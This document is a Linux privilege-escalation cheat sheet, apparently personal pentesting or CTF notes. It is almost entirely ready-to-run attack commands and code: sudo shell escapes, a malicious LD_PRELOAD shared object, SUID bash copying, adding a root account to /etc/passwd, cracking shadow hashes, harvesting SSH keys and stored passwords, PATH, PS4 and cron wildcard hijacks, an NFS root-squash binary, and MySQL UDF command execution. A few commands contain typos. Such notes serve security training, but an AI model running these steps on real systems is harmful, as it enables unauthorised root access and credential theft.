Linux

Test For Kernel Exploits

uname -a

cat /etc/issue

cat /etc/*-release

les.sh

Test For sudo permissions

sudo -l

General Scoping

grep -Ri 'db' /var/www --color=auto

grep -Ri 'sql' /var/www --color=auto

grep -Ri '$db_name' /var/www --color=auto

ls -lsa /tmp/

ls -lsa /dev/shm

ls -lsa /opt/

ls -lsa /

ls -ls /etc anything other than root:root root:fuse root:shadow root:dip

ls -lsa /etc | grep -i '.secret'

ls -lsaR /var/mail

ls -lsaR /var/spool/mail

ls -lsaR /home

mount

lsblk

cat /etc/fstab

Vulnerable Driver Discovery

List drivers

lsmod

get libata driver information and version

modinfo libata

Test SUDO

Reference https://gtfobins.github.io/

Nano

sudo find /bin -name nano -exec /bin/sh \;

Awk

sudo awk 'BEGIN {system("/bin/sh")}'

Nmap

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

Vim

sudo vim -c '!sh'

LD_PRELOAD

create file as malicious.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

compile and load

gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfiles

sudo LD_PRELOAD=/tmp/malicious.so apache2

Shared Object Injection

find / -type f -perm -04000 -ls 2>/dev/null

Run strace on SUIDs to find "foundso.so"

strace /usr/local/bin/SuidFromPreviousOutput 2>&1 | grep -i -E "open|access|no such file"

mkdir /home/user/.config

cd /home/user/.config

create foundso.c

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));
void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

gcc -shared -o /home/user/.config/foundso.so -fPIC /home/user/.config/foundso.c
/usr/local/bin/somesuid

sudo apache2 -f /etc/shadow

Test SUID files

Reference https://gtfobins.github.io/ and google the rest not listed.

find / -perm /4000 2> /dev/null

Test etc/passwd & etc/shadow

Test for readable / writeable /etc/passwd OR /etc/shadow

ls -la /etc/passwd /etc/shadow

Only if Both Readable

unshadow passwd shadow > unshadowed.txt

hashcat -m 1800 unshadowed.txt rockyou.txt -O

Writable etc/passwd

openssl passwd thescriptkid

echo 'thescriptkid:$1$ZEx4UyBv$/2BpqiGuy7vuNC7X9SsTO0:0:0:thescriptkid:/home/thescriptkid:/bin/bash' >> /etc/passwd

su thescriptkid

Stored Passwords & Keys

OVPN Files

find / -iname "*.ovpn" 2> /dev/null

Irssi Files

find / -iname "config" 2> /dev/null | grep -i "irssi"

cat filename | grep -i passw

Bash History

cat /home/*/.bash_history | grep -i passw

SSH Keys

find / -name id_rsa 2> /dev/null

chmod 400 id_rsa

ssh -i id_rsa someuser@$ip

Abusing Intended Functionality

Symlinks

Nginx below 1.6.2-5+deb8u3 logrotate Local Privilege Escalation

Environment Variables

Path

find / -type f -perm -04000 -ls 2>/dev/null

strings /usr/local/bin/onfoundsuid

C functions such as setresgid, setresuid, and system are of interest and should be investigated. Relative path commands such as "service" apache2 start can be abused.

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c

gcc /tmp/service.c -o /tmp/service

export PATH=/tmp:$PATH

/usr/local/bin/onfoundsuid

Functions, ShellOpts & PS4

find / -type f -perm -04000 -ls 2>/dev/null

strings /usr/local/bin/onfoundsuid

C functions such as setresgid, setresuid, and system are of interest and should be investigated. Absolute or Relative path commands such as "service" can be abused by creating functions in the current shell session.

Method 1

function /usr/sbin/onfoundsuid() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

export -f /usr/sbin/service

/usr/local/bin/onfoundsuid

Method 2

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && 

chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/onfoundsuid; set +x; /tmp/bash -p'

Capabilities

getcap -r / 2>/dev/null

Python 2.6

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Cron

cat /etc/crontab

ls /etc/cron.d

cat /var/spool/cron/crontabs/root

Path

This abuses misconfigured path in "/etc/crontab". If a user has write permissions in the directory that is in the path. create a file with the same name as the cronjob with malicious contents.

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /writeable/directory/somefile

chmod +x /wrietable/directory/somefile

/tmp/bash -p

Wildcards

cat /etc/crontab

Tar

Exploitable if cronjob script that is using tar and has a wildcard * Example: tar czf /tmp/backup.tar.gz

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
/home/user/--checkpoint=1

touch /home/user/--checkpoint-action=exec=sh\ runme.sh

Wait for execution

/tmp/bash -p

File Overwrite

cat /etc/crontab

Exploitable if script is writeable by the current user

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/writable/writablescript

/tmp/bash -p

NFS Root Squashing

Victim Machine

cat /etc/exports

Kali Machine

showmount -e ip

mount -o rw,vers=2 ip:/tmp /tmp/1

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/thescriptkid.c

gcc /tmp/1/x.c -o /tmp/1/thescriptkid

chmod +s /tmp/1/thescriptkid

Victim Machine

/tmp/thescriptkid

Mysql

prequisites - a valid database

show databases;

CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';

select sys_eval("cp /bin/bash /var/tmp/bash ; chmod u+s /var/tmp/bash");

/var/tmp/bash -p

Run LinPEAS

try passwords found in config PHP files